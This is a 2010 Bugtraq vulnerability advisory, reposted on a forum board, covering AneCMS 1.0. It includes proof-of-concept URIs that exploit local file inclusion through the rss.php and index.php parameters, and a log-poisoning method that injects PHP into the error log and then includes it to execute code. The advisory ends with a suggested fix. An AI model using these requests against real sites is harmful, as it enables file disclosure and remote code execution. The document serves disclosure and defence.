AneCMS Multiple Vulnerabilities

看板Bugtraq作者admin.時間16年前 (2010/04/13 09:32)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

##########################www.BugReport.ir##################################= ###### # # AmnPardaz Security Research Team # # Title:=09=09AneCMS Multiple Vulnerabilities # Vendor:=09=09http://anecms.com/ # Vulnerable Version:=091.0 (Latest version till now) # Exploitation:=09=09Remote with a RAW HTTP packet sender # Fix:=09=09=09N/A ############################################################################= ####### #################### - Description: #################### AneCMS is a small and fast CMS completely modular. Written in PHP with =20 JS(jQuery), Multilanguage, Skinnable and has an online repository of modules accessible from the ACP of the =20 CMS. Using MySQL as the backend DBMS. #################### - Vulnerability: #################### +--> Local File Inclusion (LFI) =09The AneCMS try to locate local files for responding users according =20 to GET parameters. There are 25 infected =09files, but approximately whole of them are protected else of the =20 'index.php' and 'rss.php' files. Check the =09exploits section for the details. +--> Remote Code Execution =09With a RAW HTTP packet sender, you can send unescaped php code to =20 AneCMS. Then this code can be executed using =09the LFI vulnerability. Check the exploits section for the details. #################### - Exploits/PoCs: #################### +--> Exploiting The Local File Inclusion (LFI) =09For the 'rss.php', you can select local file relative path from the =20 'modules' directory using 'module' GET =09parameter. For example following URI can be used for inspecting the =20 '.htaccess' file: =09http://target.com/rss.php?module=3D../.htaccess%00 =09For the 'index.php', you can select local file relative path from the =20 'system/ajax' directory using 'ajax' GET =09parameter. For example following URI can be used for inspecting the =20 '.htaccess' file: =09http://target.com/index.php?ajax=3D../../.htaccess%00 +--> Remote Code Execution =09This attack should be done in two phases. First use the LFI to inject =20 the desired php code in the web server =09log file. Then use the LFI again to execute it. =09For example if you want to run '<?php echo "ShahShah..."; ?>' code, =20 first send the following HTTP packet: =09=09GET /rss.php?module=3D../<?php echo "ShahShah..."; ?>%00 HTTP/1.0 =09=09Host: target.com =09=09User-Agent: UA =09This packet will inject the '<?php echo "ShahShah..."; ?>' in the =20 error logs. Then visit following URI: =09http://target.com/rss.php?module=3D../the/path/to/logs/folder/logs/php_er= ror.log%00 =09Above URI will include the error log (including your injected code) =20 and execute it. #################### - Solution: #################### Instead of generating the inclusion path by GET parameters directly, =20 check the value of the parameter and then include the valid hard-coded file path. #################### - Original Advisory: #################### http://www.bugreport.ir/index_71.htm #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 admin. 的文章

文章代碼(AID): #1BmycJfd (Bugtraq)